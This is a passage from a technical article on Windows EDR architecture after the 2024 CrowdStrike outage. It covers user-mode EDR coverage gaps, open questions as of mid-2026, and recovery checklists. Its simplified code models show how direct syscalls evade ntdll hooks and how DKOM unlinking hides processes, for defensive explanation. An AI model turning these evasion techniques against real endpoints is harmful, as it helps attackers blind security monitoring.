3. Operate from below the kernel, in the hypervisor. The Garfinkel and Rosenblum NDSS 2003 origin paper on virtual machine introspection [@wiki-vmi], the Xen Project's VMI APIs [@xen-vmi], Bitdefender's Hypervisor Introspection product shipped commercially in 2016 [@xen-vmi], and Microsoft's own in-platform Virtualization-Based Security (VBS), Hypervisor-protected Code Integrity (HVCI), and Secure Kernel features [@mslearn-hvci].

flowchart TD
    Q["Where does the third-party security observer run?"]
    Q --> A1["1. User mode, subscribing via platform broker"]
    Q --> A2["2. Kernel mode, verifier-bounded extension"]
    Q --> A3["3. Hypervisor, below the guest kernel"]
    A1 --> A1a["Apple ESF, since 2019"]
    A1 --> A1b["Windows endpoint security platform, since 2025"]
    A2 --> A2a["Linux eBPF"]
    A2 --> A2b["eBPF for Windows, since 2021"]
    A3 --> A3a["Bitdefender Hypervisor Introspection, 2016"]
    A3 --> A3b["Microsoft VBS, HVCI, Secure Kernel"]

Why Microsoft picked (1) over (2)

This is one of the most interesting decisions in the whole story, and the public reasoning is mostly implicit. The eBPF answer (2) would have required every EDR vendor to rewrite on a substrate they had no muscle memory for. The Linux EDR industry took roughly five years to converge on eBPF as its dominant collection mechanism, and Windows EDR vendors have invested in a different abstraction (kernel callbacks plus minifilters) for twenty-five years. A migration to eBPF for Windows would have meant a multi-year vendor-side rewrite onto a platform whose published EDR-relevant attach-point coverage was still incomplete in mid-2026 [@msft-ebpf-windows].

The Apple-style answer (1), by contrast, lets vendors keep most of their detection logic where it already runs -- in user-mode sensor processes -- and only replaces the Ring-0 collection substrate with a platform broker. The migration is incremental rather than ground-up. Answer (1) also carries a second structural advantage. Even a sound eBPF verifier leaves vendor bytecode running inside the kernel, alongside the verifier, the JIT or native-code compiler, and the helper functions it trusts; a bug anywhere in that trusted base can still turn malformed vendor content into a kernel fault. Answer (1) makes the question unaskable by construction: there is no third-party kernel code path, so a third-party content-validator failure cannot crash the kernel.

Microsoft made a comparative-architecture bet. The bet has a known cost: things a kernel-mode observer can see that a user-mode observer cannot. What exactly does the user-mode EDR lose? That is section 8.

8. What User-Mode EDR Cannot See

Every architectural choice closes some doors. The user-mode EDR architecture closes the door on Channel-File-291-class reliability incidents -- by construction, a vendor-authored data file consumed by a vendor-authored user-mode process can crash the vendor process, not the host. The same architecture, on its own, opens three coverage doors a kernel-callback EDR closed. This section enumerates them honestly.

Gap 1: direct syscall observation

A malicious user-mode process can issue x86-64 syscall instructions directly, bypassing ntdll.dll's exported stubs and therefore bypassing any user-mode hook layer that depends on patching those stubs [@mdsec-direct-syscall]. MDSec's December 2020 write-up "Bypassing user-mode hooks and direct invocation of system calls for red teams" documented the technique in operational detail: an attacker recovers the syscall numbers from a clean copy of ntdll, emits the syscall instruction inline in their own payload, and the operating system services the syscall without ever touching the hook layer the EDR vendor injected into ntdll [@mdsec-direct-syscall]. A user-mode EDR sees only what the platform broker tells it. For the broker to maintain coverage of direct-syscall payloads, the broker itself must be wired into the kernel's system-service dispatch path (entered on x64 at nt!KiSystemCall64) and emit telemetry for every syscall, not only those that arrive via the ntdll stubs.
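The asymmetry between the hook layer and the dispatch path shows up even in a toy model. The sketch is hypothetical: `ntdll`, `kernelDispatch`, and the syscall number `0x18` are placeholders (real syscall numbers vary across Windows builds), and a JavaScript function call stands in for the `syscall` instruction.

```javascript
// Hypothetical model of why ntdll hooks miss direct syscalls.
// The syscall number is a placeholder; real numbers vary by Windows build.
const userHookLog = []; // what an EDR hook patched into ntdll sees
const kernelLog = [];   // what an observer on the dispatch path sees

// Kernel side: every syscall, however it was issued, reaches the dispatcher.
const SYSCALL_TABLE = { 0x18: 'NtAllocateVirtualMemory' };
function kernelDispatch(number, args) {
  kernelLog.push(SYSCALL_TABLE[number]);
  return 0; // STATUS_SUCCESS
}

// User side: the exported ntdll stub, with an EDR hook in front of it.
const ntdll = {
  NtAllocateVirtualMemory(args) {
    userHookLog.push('NtAllocateVirtualMemory'); // injected hook
    return kernelDispatch(0x18, args);           // original stub: syscall
  },
};

// A benign caller goes through the exported stub.
ntdll.NtAllocateVirtualMemory({ size: 4096 });
// A direct-syscall payload recovers the number from a clean ntdll copy and
// issues the syscall itself, never touching the hooked stub.
kernelDispatch(0x18, { size: 4096 });

console.log(userHookLog.length, kernelLog.length); // 1 2
```

Only an observer on the kernel side of the `syscall` boundary counts both calls, which is why the broker's coverage of this gap depends on where Microsoft wires it in.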

Microsoft has stated this architecture is in scope but has not published the wire-format detail of the syscall broker as of mid-2026. The honest reading: Microsoft owns this gap, it knows it owns this gap, the EDR partners know Microsoft owns this gap, but the specific shape of the broker's syscall-path integration has not been publicly documented. Treat any third-party claim about the broker's syscall-path wire format as speculation.

Gap 2: rootkit visibility, and the hypervisor answer

A kernel-mode rootkit -- loaded via a Bring-Your-Own-Vulnerable-Driver attack against a signed-but-vulnerable third-party driver -- can hide processes, files, registry keys, and network state from any user-mode observer. The platform broker will emit whatever the kernel reports about system state; if the rootkit falsifies the kernel's own data structures through Direct Kernel Object Manipulation (DKOM), for example by unlinking a process from the list the kernel enumerates, the broker will faithfully emit the lie.

Bring-Your-Own-Vulnerable-Driver (BYOVD): An attack technique in which a malicious user-mode payload loads a signed, legitimately-issued kernel driver that has a known unfixed vulnerability, then exploits the driver's vulnerability to gain Ring-0 code execution. Because the driver is legitimately signed, neither Windows driver-signing enforcement nor most heuristic load-time defenses block the initial driver load; the attacker gets kernel privilege via a third-party driver they did not have to author or sign themselves.

Microsoft's stated answer for the rootkit-visibility gap is to layer a generation of hypervisor-assisted memory introspection below the user-mode EDR. Bitdefender shipped the first commercial Hypervisor Introspection product in 2016 on top of Xen [@xen-vmi]. Academic work has continued: The Reversing Machine (Karvandi et al., May 2024, arXiv:2405.00298) describes a contemporary research-grade implementation using Intel Mode-Based Execution Control to intercept user-kernel mode transitions and a suspended-process-creation technique to attach hypervisor-based introspection to running guests transparently [@trm-arxiv-2405-00298].

VBS, HVCI, and the Secure Kernel: Microsoft's family of in-platform virtualization-based security primitives. *Virtualization-Based Security (VBS)* runs a Hyper-V-derived hypervisor below the Windows kernel, creating two virtual trust levels (VTL0 for the normal kernel, VTL1 for the Secure Kernel). *Hypervisor-protected Code Integrity (HVCI)* enforces that kernel-mode pages are either writable or executable but never both, and that only signed code can be loaded into kernel mode; the enforcement runs in the Secure Kernel and cannot be subverted from VTL0 [@mslearn-hvci].

The Microsoft-side equivalent of the Bitdefender HVI architecture is the family of platform features documented under VBS, HVCI, and the Secure Kernel [@mslearn-hvci]. VTL1, where the Secure Kernel runs under hypervisor protection, is architecturally the vantage from which the normal kernel's memory can be read authoritatively, answering questions about kernel state that the VTL0 kernel itself cannot be trusted to answer correctly. Whether the Windows endpoint security platform's broker will surface that authoritative read to third-party EDR partners -- and through what API -- is part of the not-yet-public detail of the platform.
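DKOM hiding, and the cross-view defense that a more privileged vantage enables, can be modeled with a linked list. This is a sketch under loud assumptions: the structures only loosely echo `EPROCESS.ActiveProcessLinks`, the `allocations` array stands in for a direct scan of every process object in memory, and nothing here is a Microsoft API. The technique itself, diffing a list walk against a direct memory scan, is the classic cross-view approach of memory-forensics tools; its value from VTL1 or a hypervisor is that VTL0 malware cannot tamper with the scanner.

```javascript
// Hypothetical model of DKOM process hiding and cross-view detection.
// Not a real Windows layout.
function makeProc(pid, name) {
  return { pid, name, flink: null, blink: null };
}

// Circular doubly linked list headed by a sentinel node.
const head = makeProc(0, '<head>');
head.flink = head.blink = head;
const allocations = []; // stands in for every process object in memory

function insert(p) {
  p.flink = head;
  p.blink = head.blink;
  head.blink.flink = p;
  head.blink = p;
  allocations.push(p);
}

// The view a kernel enumeration API (and hence a broker) reports.
function listWalk() {
  const seen = [];
  for (let p = head.flink; p !== head; p = p.flink) seen.push(p.pid);
  return seen;
}

// DKOM: unlink the node. The object still exists and its threads still run.
function dkomHide(p) {
  p.blink.flink = p.flink;
  p.flink.blink = p.blink;
  p.flink = p.blink = p; // self-linked so it looks consistent if inspected
}

// Cross-view: scan memory directly and diff against the list walk.
function crossView() {
  const listed = new Set(listWalk());
  return allocations.filter((p) => !listed.has(p.pid)).map((p) => p.pid);
}

[4, 812, 1337].forEach((pid) => insert(makeProc(pid, 'proc' + pid)));
dkomHide(allocations[2]);

console.log(listWalk());  // [ 4, 812 ]
console.log(crossView()); // [ 1337 ]
```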

Gap 3: tamper resistance of the EDR process itself

A user-mode EDR is a user-mode process. Malware that obtains SeDebugPrivilege -- usually by abusing a misconfigured service account or a credential-stealing exploit -- can in principle suspend or terminate the EDR process. The Windows mitigation for this class of attack is Protected Process Light (PPL), the same mechanism Microsoft uses to harden MsMpEng.exe (the Microsoft Defender Antimalware Service) against tampering by anything short of a kernel-mode attacker. Whether the Windows endpoint security platform's user-mode EDR processes will get PPL by default in the private preview, and whether they will get a stronger Protected Process classification, is not documented in any primary source as of mid-2026.
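Protected Process Light works by comparing protection levels rather than privileges. The sketch below is simplified: the numeric values mirror a subset of the Windows `PS_PROTECTED_TYPE` and `PS_PROTECTED_SIGNER` enumerations, but the `dominates` rule is a numeric approximation of the kernel's actual per-signer dominance table, and `canTerminate` does not model ordinary DACL checks or the limited access rights Windows still grants unprotected callers.

```javascript
// Simplified model of Protected Process Light (PPL) access checks.
// Values mirror a subset of PS_PROTECTED_TYPE / PS_PROTECTED_SIGNER; the
// numeric dominance rule approximates, and does not reimplement, the kernel.
const Type = { None: 0, ProtectedLight: 1, Protected: 2 };
const Signer = { None: 0, Authenticode: 1, CodeGen: 2, Antimalware: 3, Lsa: 4, Windows: 5, WinTcb: 6 };

function dominates(caller, target) {
  return caller.type >= target.type && caller.signer >= target.signer;
}

// May `caller` open `target` with terminate rights?
function canTerminate(caller, target) {
  // Unprotected target: this sketch grants access only via SeDebugPrivilege.
  if (target.type === Type.None) return Boolean(caller.seDebug);
  // Protected target: privileges do not help; only protection level counts.
  return dominates(caller, target);
}

const edrUnprotected = { type: Type.None, signer: Signer.None };
const edrPpl = { type: Type.ProtectedLight, signer: Signer.Antimalware };
const malware = { type: Type.None, signer: Signer.None, seDebug: true };

console.log(canTerminate(malware, edrUnprotected)); // true
console.log(canTerminate(malware, edrPpl));         // false
```

The design choice the model captures is that SeDebugPrivilege is an identity-based override, while PPL is a code-signing-based one; a kernel-mode attacker sidesteps both, which is why PPL stops short of kernel-mode tampering.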

The BYOVD coverage question, with a dated negative finding

The CISA Eviction Strategies Tool countermeasure CM0058 describes when Microsoft's Vulnerable Driver Block List is actually enforced: "Microsoft's vulnerable driver blocklist is a native utility for Windows 11 2022 and above that receives updates 1-2 times per year... enforced when Hypervisor-protected coded integrity or HVCI, Smart App Control, or S mode is active" [@cisa-cm0058, @mslearn-driver-block-rules]. Microsoft's block-list documentation adds App Control for Business as the fourth enforcement substrate [@mslearn-driver-block-rules]. The block list itself is a Microsoft-maintained deny-list of kernel drivers: specifically, the signed-but-vulnerable drivers known to be abused in bring-your-own-vulnerable-driver (BYOVD) attacks.

Note: Neither CISA's CM0058 page nor any Microsoft public document publishes aggregate telemetry on what fraction of Windows enterprise endpoints have any of the four enforcement substrates (HVCI, Smart App Control, S Mode, or App Control for Business) active in mid-2026 [@cisa-cm0058]. Microsoft Defender for Endpoint surfaces per-tenant Memory Integrity enablement recommendations; Microsoft has not aggregated those recommendations into a fleet-level statistic. The BYOVD enforcement coverage gap is known qualitatively (the block list exists; enforcement is opt-in via four substrates; updates are infrequent) but cannot be quantified from public evidence.
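No fleet-wide figure is public. An administrator who already inventories the four substrates per device can still compute the equivalent number for their own estate. The sketch below assumes a hypothetical per-endpoint record with one boolean per substrate. The `Endpoint` fields and sample device names are illustrative and are not a Defender for Endpoint schema. The code encodes the rule described above: any one substrate is enough to turn the block list into an enforced control.

```python
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class Endpoint:
    """Hypothetical inventory record; field names are illustrative."""
    name: str
    hvci: bool = False
    smart_app_control: bool = False
    s_mode: bool = False
    app_control_for_business: bool = False


def blocklist_enforced(ep: Endpoint) -> bool:
    # Any one of the four substrates activates block-list enforcement.
    return ep.hvci or ep.smart_app_control or ep.s_mode or ep.app_control_for_business


def enforcement_fraction(fleet: Iterable[Endpoint]) -> float:
    """Share of endpoints on which the block list is enforced (0.0 for an empty fleet)."""
    endpoints = list(fleet)
    if not endpoints:
        return 0.0
    return sum(blocklist_enforced(ep) for ep in endpoints) / len(endpoints)


fleet = [
    Endpoint("fin-ws-01", hvci=True),
    Endpoint("fin-ws-02"),
    Endpoint("kiosk-01", s_mode=True),
    Endpoint("legacy-srv-01"),
]
print(f"{enforcement_fraction(fleet):.0%} of endpoints enforce the block list")
```

The number this produces is only as good as the inventory feeding it. Its value is that it replaces a guess with a per-estate measurement.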

The kernel attack surface that nothing in user mode can observe

Below all of this -- below user-mode EDR, below kernel-mode EDR, below the Secure Kernel -- lies the genuine bottom of the stack: bootkits, System Management Mode (SMM)-resident malware, firmware implants, and pre-boot attacks that compromise the host before any antivirus product has loaded. No user-mode EDR can meaningfully observe any of this. No kernel-mode EDR can fully observe any of this either. The platform answers are Secured-core PC, Microsoft Pluton, and Measured Boot: platform-curated, Microsoft-owned, hardware-rooted defenses inside which the third-party industry does not write code. The WRI does not close the firmware gap; it delegates the firmware gap to Microsoft platform features. That delegation is exactly what Microsoft has always wanted (the platform owns the security boundary) and exactly what vendors have always resisted (the platform owns the security boundary). July 19, 2024 is the day vendors stopped publicly resisting.

The coverage matrix

The coverage tradeoffs in one table. Cells mark the architecture's native ability to observe each visibility primitive: full coverage, partial coverage, or none.

Visibility primitive	Kernel-callback EDR	User-mode EDR + broker	Hypervisor introspection	Microsoft platform features
Direct syscall (no `ntdll` stub)	full (via syscall path hooks)	partial (depends on broker wire format)	full (from VTL1)	full (by construction)
Rootkit visibility (DKOM)	partial (rootkit can subvert peer-driver views)	none (broker reflects kernel-reported state)	full (authoritative memory read)	full (via Secure Kernel)
Tamper resistance of the EDR process	partial (kernel access lets attacker disable peer driver)	partial (PPL needed)	full (out of band)	full (Defender uses PPL today)
BYOVD detection	partial (post-load only)	none (vendor cannot reload kernel)	partial (post-load, via VTL1 inspection)	full (Vulnerable Driver Block List + HVCI, where enabled)
Bootkit, SMM, firmware visibility	none	none	partial (pre-OS attestation only)	full (Secured-core PC, Pluton, Measured Boot)

Key idea: The user-mode EDR architecture closes the reliability problem (a Channel-File-291-class bug crashes a user-mode process, not the kernel). It does not, on its own, close the coverage problem. The coverage problem is being delegated from vendor EDR to Microsoft platform features -- to the Vulnerable Driver Block List, to HVCI, to the Secure Kernel, to Pluton, to Defender's baseline detection coverage. Whether that delegation reaches Method-A coverage equivalence is the open architectural question of mid-2026, and the honest answer is "we do not yet know."

What else is genuinely open? That is section 9.

9. What Is Still Open in mid-2026

What does the honest answer look like, twenty-three months after the outage and twelve months after the WRI's detailed rollout? It is several dated negative findings and one positive finding. The right epistemic posture for reading them is the same posture security engineers should bring to any architectural transition in flight: the absence of an announcement is its own evidence.

Has Microsoft committed to a date by which third-party AV kernel drivers will be forbidden?

No primary source uses the words "ban" or "deadline" or any equivalent hard-stop phrasing. The November 18, 2025 Microsoft Windows Experience Blog frames the program as an enforcement migration -- "shifts AV enforcement from the kernel to user mode" -- and the June 26, 2025 Weston post commits to the private preview as a step in a partner-coordinated journey, not as the first of two phases ending in a third-party kernel-driver lockout [@ms-nov-2025, @weston-2025-06-26]. The article describes the transition as multi-year, partner-coordinated, and without a published hard deadline as of mid-2026. Anyone telling you Microsoft has committed to a date is reading something into the public record that the public record does not contain.

Will the WRI user-mode EDR APIs reach feature equivalence with today's kernel-callback EDR?

The on-record partner statements quoted in the June 26, 2025 blog use hedging language: "continue to provide feedback," "no degradation in security or performance," and similar [@weston-2025-06-26]. That phrasing is not a claim of equivalence achieved; it is a claim of commitment to work toward equivalence. The strongest evidence that equivalence is reachable is Apple's seven-year ESF deployment: by 2026, every major Windows-side EDR vendor also ships a macOS-side ESF-based product, and the macOS-side product is broadly considered competitive in detection coverage with peer kernel-based products on other platforms. The Windows answer for mid-2026 is empirically unknown -- the API surface is in active evolution, and the partner cohort is still inside the private preview.

Has any MVI 3.0 deployment ring actually halted a vendor content update since June 26, 2025?

This is the most important operational question and the one with the most honest negative answer. No public primary source documents either of two events from any of the eight named MVI 3.0 partners through the most recent search horizon. The first would be a ring stop-gate event: an MVI 3.0 partner caught a latent Channel-File-291-class bug at a canary ring and halted the rollout before fleet propagation. The second would be a ring-escape incident: a latent bug got through the rings and produced a fleet event. The honest framing has two competing readings: the rings are working silently, or the rings have not yet been stress-tested by a Channel-File-291-class latent bug in any partner's content pipeline. Neither reading can be discriminated from current public evidence.

The SentinelOne May 29, 2025 event is the closest post-WRI partner-side reliability incident on the public record, and it is worth a paragraph of distinction. Per SentinelOne's own RCA, "a software flaw in an outgoing infrastructure control system triggered an automatic function that removed critical network routes," which knocked the customer-facing management console offline. Also per the RCA, "customer endpoints remained protected" throughout, federal environments were not impacted, and no endpoint content update was involved [@sentinelone-may-29-rca]. The event is therefore structurally orthogonal to the failure mode the MVI 3.0 rings are designed to catch, so it does not stress-test them. The rings address Safe Deployment Practices for sensor and content updates, not cloud control-plane reliability.

Will Microsoft hold itself to the same kernel-out standard as MVI partners?

The November 18, 2025 Microsoft Windows Experience Blog uses the framing "AV enforcement" (not "third-party AV enforcement") -- by plain reading this commits Microsoft Defender for Endpoint to the same trajectory as the third-party MVI 3.0 cohort [@ms-nov-2025]. The article notes this as the closest available public Defender-kernel-out signal, while being honest that no Defender-specific GA date for the user-mode migration has been published. The same November 18 post explicitly carves out graphics drivers [@ms-nov-2025]. By plain reading, that means non-AV third-party kernel drivers, graphics drivers among them, will continue to ship under the existing model. The WRI is, narrowly, an AV-enforcement migration.

In June, we released the first private preview of the Windows endpoint security platform, which shifts AV enforcement from the kernel to user mode... Graphics drivers, for example, will continue to run in kernel mode for performance reasons. -- Microsoft Windows Experience Blog, November 18, 2025 [@ms-nov-2025]

Note: The MVI 3.0 ring question -- has any partner actually halted a rollout at a ring boundary since June 26, 2025? -- admits two readings from current evidence. Reading one: the rings are working silently, catching latent bugs that never become public, because the entire point of a working ring is that nothing happens. Reading two: the rings have not yet been stress-tested by a Channel-File-291-class latent bug at any partner. Both readings are consistent with the dated negative finding "no public stop-gate event has been documented." Anyone telling you they know which reading is right is overclaiming. The right epistemic posture is to keep watching, and to read partner-side RCAs as they appear.

What fraction of enterprise Windows endpoints enforces the Vulnerable Driver Block List?

The CISA CM0058 page is the canonical document, and it publishes no enablement telemetry [@cisa-cm0058]. Microsoft's own documentation for the block list publishes two things: the update cadence (one to two times per year) and a per-substrate description of where the block list activates (HVCI, Smart App Control, S Mode, or App Control for Business). It publishes no aggregate fleet-level enablement statistic [@mslearn-driver-block-rules, @cisa-cm0058]. Microsoft Defender for Endpoint surfaces per-tenant Memory Integrity enablement recommendations but does not aggregate them across tenants. The BYOVD enforcement gap is known qualitatively and cannot be quantified from public evidence as of mid-2026. Anyone publishing a percentage figure for HVCI enablement across the global Windows enterprise fleet is publishing a guess.

These are five open questions with five honest answers. The reader leaves section 9 knowing not the answers, but the shape of the questions -- which is the right epistemic state in which to read the practical guide that follows. What should you do, mid-2026, with this knowledge? That is section 10.

10. Practical Guide for mid-2026

Three audiences, three different sets of next moves. The article has been writing for these three audiences since the first paragraph -- the Windows enterprise administrator, the security-product architect, and the incident responder -- and each gets a short, concrete checklist that respects the open architectural questions of section 9.

For the Windows enterprise administrator

Treat your antivirus and EDR vendor's update cadence as part of your fleet's blast radius. The cadence of vendor content updates is, in mid-2026, the operational variable most likely to produce your next mass-availability incident. Ask your vendor for their MVI 3.0 documentation and verify they are running staged deployment rings rather than gating only at a single global GA promote [@mslearn-mvi, @weston-2025-06-26].
Enable Quick Machine Recovery on Windows 11 24H2 and later [@mslearn-qmr]. QMR is the platform-level recovery primitive Microsoft built specifically for the Channel-File-291 failure pattern, in which bad content persists on disk and crashes the host on every boot. It materially reduces recovery time for any future event that produces unbootable hosts at scale [@insider-build-26120-4230].
Enable HVCI / Memory Integrity wherever your hardware supports it [@mslearn-hvci]. HVCI is one of the four substrates that activate Microsoft's Vulnerable Driver Block List. Enabling it turns the BYOVD block list from a published-but-inert resource into an enforced runtime control on your endpoints [@mslearn-driver-block-rules, @cisa-cm0058].
If your fleet still depends on a kernel-only AV stack, push your vendor for their Method-C (user-mode) roadmap commitments. The MVI 3.0 partner cohort named in Weston's June 26, 2025 post is the right reference list: vendors not on it have not made a public commitment of equivalent specificity, and that should affect your procurement calculus [@weston-2025-06-26].
Audit your Defender exclusion list. The principle of least privilege applies to your AV configuration just as much as to your user accounts -- every exclusion is a path past your detection coverage, and Defender exclusions inherited from 2018 deployments are a routine finding in modern enterprise audits.

For the security-product architect

Apply for MVI 3.0 partnership and request access to the Windows endpoint security platform private preview now [@mslearn-mvi]. The API surface is in active evolution and partner feedback is materially shaping the contract. Vendors who wait for GA will inherit a contract written by competitors.
Plan a migration roadmap from kernel callbacks (Method A) to user-mode subscription (Method C). Assume Method A remains the bridge for several more years and that a hybrid Method-A-plus-Method-C deployment will be your production reality through at least the late 2020s. Engineer for Method C as the future-primary substrate while Method A continues to carry production detection coverage.
Engineer your content delivery pipeline as if the platform will eventually require ring-based staged deployment under contractual gating. The MVI 3.0 deployment-ring requirements are the model: internal ring, canary ring, GA ring, with monitored promotion gates between each [@weston-2025-06-26]. Build the pipeline now even if the contractual requirement does not yet bind you, because the alternative is rebuilding it under emergency pressure later.
For BYOVD coverage and rootkit visibility you cannot get from user mode, design around platform features rather than rebuilding them yourself. The Vulnerable Driver Block List, HVCI, Secured-core PC, Pluton, and Defender's baseline are platform-curated controls; layer your detection coverage on top of them rather than parallel to them [@mslearn-driver-block-rules, @mslearn-hvci, @cisa-cm0058].
Treat the Apple ESF deployment as your reference implementation. Your macOS-side ESF migration -- which most major Windows EDR vendors completed between 2019 and 2024 -- is the closest analogue to the Windows-side migration you are now starting. The architectural lessons transfer; do not repeat the early-ESF mistakes on the Windows side.
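The internal / canary / GA ring structure in the checklist above can be sketched as a promotion loop. Each step deploys to a ring, checks that ring's health signal, and promotes only if the gate passes. This is a minimal sketch under stated assumptions, not the MVI 3.0 contract. The `deploy` and `healthy` callbacks are hypothetical stand-ins for a real delivery mechanism and real telemetry (crash rates, sensor heartbeats). A production gate would also wait out a bake period before reading health.

```python
from dataclasses import dataclass, field
from typing import Callable, List, Optional, Sequence

DEFAULT_RINGS = ("internal", "canary", "ga")


@dataclass
class RolloutResult:
    reached: List[str] = field(default_factory=list)  # rings that received the update
    halted_at: Optional[str] = None  # ring whose promotion gate failed, if any


def staged_rollout(
    deploy: Callable[[str], None],
    healthy: Callable[[str], bool],
    rings: Sequence[str] = DEFAULT_RINGS,
) -> RolloutResult:
    """Deploy ring by ring; stop at the first ring whose health gate fails."""
    result = RolloutResult()
    for ring in rings:
        deploy(ring)
        result.reached.append(ring)
        # Promotion gate: the next ring sees the update only if this one stays healthy.
        if not healthy(ring):
            result.halted_at = ring
            return result
    return result


deployed: List[str] = []
outcome = staged_rollout(deploy=deployed.append, healthy=lambda ring: ring != "canary")
print(outcome)  # the bad content never reaches the GA ring
```

The key design choice is that promotion is the exception, not the default. An unhealthy canary stops the loop, and nothing downstream is ever contacted.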

For the incident responder

The on-disk artifacts from the July 19 outage -- C-00000291*.sys channel files, the minidumps with csagent.sys+0x... frames -- are the canonical reference set for "vendor-content-update-bug-checks-kernel-driver" investigations [@ms-secblog-2024-07-27]. Treat any future "vendor module + nt!KiPageFault + unmapped address" stack as structurally analogous and apply the same runbook posture.
The next analogous incident will look the same in the dumps. The faulting module name will be different; the offset will be different; the unmapped address will be different. The pattern -- vendor kernel module, page fault from nt!KiPageFault, unmapped read address in the high half of the canonical address space, PAGE_FAULT_IN_NONPAGED_AREA -- will be identical.
Build playbooks now for "vendor content update reverted but on-disk-persisted" scenarios. QMR is the platform answer [@mslearn-qmr], but your runbook is what gets your fleet through the first hour before a Microsoft-provided recovery flow is appropriate. The first-hour runbook for July 19, 2024 was "safe-mode boot, delete the file, reboot," and it is worth having that runbook in your incident playbook today for the next analogous event.
Document your AV/EDR vendor's incident-response point of contact and their SLA. The July 19 morning was characterized by vendor-side communication latency in the first hour, not by lack of platform recovery options. Pre-staging the vendor's IR contact and your fleet-wide content-revert process will materially compress your time-to-mitigation.
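The four-part dump signature in the checklist above can be written down as a triage predicate. The sketch assumes the responder has already extracted a summary for each crashed host. `DumpSummary` is a hypothetical structure, filled in by hand or by a script from WinDbg's analysis output. The vendor module list, stack frames, and sample address are illustrative. The high-half test assumes 48-bit x86-64 virtual addressing, where canonical kernel-half addresses start at `0xFFFF800000000000`. The bug-check code stands in as a proxy for "unmapped address"; confirm the unmapped read in the dump itself.

```python
from dataclasses import dataclass
from typing import Iterable, Tuple

# First canonical "high half" address under 48-bit x86-64 virtual addressing.
KERNEL_HALF_START = 0xFFFF_8000_0000_0000


@dataclass(frozen=True)
class DumpSummary:
    """Hypothetical per-host summary extracted from a kernel crash dump."""
    bugcheck: str
    faulting_module: str
    stack: Tuple[str, ...]
    fault_address: int


def matches_vendor_content_fault(dump: DumpSummary, vendor_modules: Iterable[str]) -> bool:
    """True if the dump shows the vendor-module / KiPageFault / high-half pattern."""
    vendors = {m.lower() for m in vendor_modules}
    return (
        dump.bugcheck == "PAGE_FAULT_IN_NONPAGED_AREA"
        and dump.faulting_module.lower() in vendors
        and any(frame.startswith("nt!KiPageFault") for frame in dump.stack)
        and dump.fault_address >= KERNEL_HALF_START
    )


example = DumpSummary(
    bugcheck="PAGE_FAULT_IN_NONPAGED_AREA",
    faulting_module="csagent.sys",
    stack=("nt!KeBugCheckEx", "nt!KiPageFault+0x369", "csagent+0x..."),  # illustrative
    fault_address=0xFFFF_8000_1234_5678,  # illustrative high-half address
)
print(matches_vendor_content_fault(example, ["csagent.sys"]))  # True
```

For the next incident, swap in the new vendor's module names. The predicate itself should not need to change.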
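The file-deletion step of the "safe-mode boot, delete the file, reboot" runbook is small enough to pre-stage as a script. The sketch assumes it runs somewhere Python is available against the offline Windows volume; port the same logic to whatever tooling your recovery environment actually has. CrowdStrike's July 2024 remediation guidance pointed responders at `%WINDIR%\System32\drivers\CrowdStrike` and the `C-00000291*.sys` pattern. For the next incident, both the directory and the pattern are parameters to fill in from the vendor's advisory. The script defaults to a dry run that only lists matches.

```python
from pathlib import Path
from typing import List


def find_channel_files(directory: Path, pattern: str) -> List[Path]:
    """List regular files in `directory` whose names match the glob `pattern`."""
    return sorted(p for p in directory.glob(pattern) if p.is_file())


def remove_channel_files(directory: Path, pattern: str, dry_run: bool = True) -> List[Path]:
    """Delete matching files unless dry_run is set; return what matched either way."""
    matches = find_channel_files(directory, pattern)
    for path in matches:
        if dry_run:
            print(f"would delete {path}")
        else:
            path.unlink()
            print(f"deleted {path}")
    return matches


# Example (hypothetical mount point for the offline Windows volume):
# remove_channel_files(Path(r"D:\Windows\System32\drivers\CrowdStrike"),
#                      "C-00000291*.sys", dry_run=False)
```

Run it once in dry-run mode and check the list before deleting anything. `Path.glob` matching is case-sensitive on most POSIX filesystems, which matters if the recovery environment is not Windows.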

A cross-platform reality check

A practitioner moving from macOS to Windows in 2026 will find that macOS gave them one architecture (Method C since 2019), Linux gave them one architecture in the opposite direction (eBPF dominant), and Windows is the transitional platform where Methods A, B, C, D, E, and F all coexist in different states of deployment. The architectural choice on Windows in 2026 is not "which method"; it is "which combination, and how to migrate from your current combination to your target combination." That is the bridge-year reality, and it will be the bridge-year reality through at least the late 2020s.

Note: Mid-2026 is the bridge year. Your job is to design for the bridge, not for either bank.

11. Common Misconceptions

Six questions a careful reader will already have answered for themselves, restated here for the reader who arrived at this section via the table of contents.

Was the July 19 outage a bug in Windows?

No. Microsoft Windows behaved exactly as the kernel-driver architecture requires it to behave when a third-party kernel driver faults at elevated IRQL: the kernel had no way to recover, so it stopped. The bug was in CrowdStrike's `csagent.sys` driver consuming a malformed CrowdStrike Channel File. Microsoft's own July 27, 2024 security blog is unambiguous about this. Its WinDBG walkthrough names `csagent.sys` as the faulting image and `nt!KiPageFault+0x369` as the kernel handler that received the fault [@ms-secblog-2024-07-27]. The architectural responsibility for the post-outage migration sits with Microsoft as the platform owner, but the proximate technical cause was a third-party kernel driver consuming a third-party content file [@cs-rca-2024-08-06].

Does moving EDR to user mode make Windows endpoints less secure?

Not necessarily. The user-mode EDR architecture closes the *reliability* problem -- a Channel-File-291-class bug in a vendor's content pipeline crashes the vendor's user-mode process, not the kernel. User mode on its own loses coverage of direct syscalls, rootkit visibility, and BYOVD detection. For those *coverage* gaps, Microsoft is layering three platform features below the user-mode EDR: hypervisor-assisted introspection via VBS and HVCI [@mslearn-hvci], the Vulnerable Driver Block List for BYOVD [@mslearn-driver-block-rules, @cisa-cm0058], and Defender as the baseline detection floor. Whether the combined stack reaches coverage equivalence with today's kernel-callback EDR is the article's central open question, and the honest mid-2026 answer is that it is not yet settled [@weston-2025-06-26, @ms-nov-2025].

Will Microsoft Defender leave the kernel too?

The strongest available public signal as of mid-2026 is the framing in the November 18, 2025 Microsoft Windows Experience Blog. It says *"AV enforcement"* (not *"third-party AV enforcement"*) is shifting from kernel to user mode; by plain reading, that includes Defender for Endpoint [@ms-nov-2025]. No Defender-specific GA date for the user-mode migration has been published. The same November 18 post explicitly carves out graphics drivers, which continue to ship in kernel mode for performance reasons. The WRI is therefore, narrowly, an AV-enforcement migration and not a wholesale third-party kernel-driver lockout [@ms-nov-2025].

At what IRQL did csagent.sys fault?

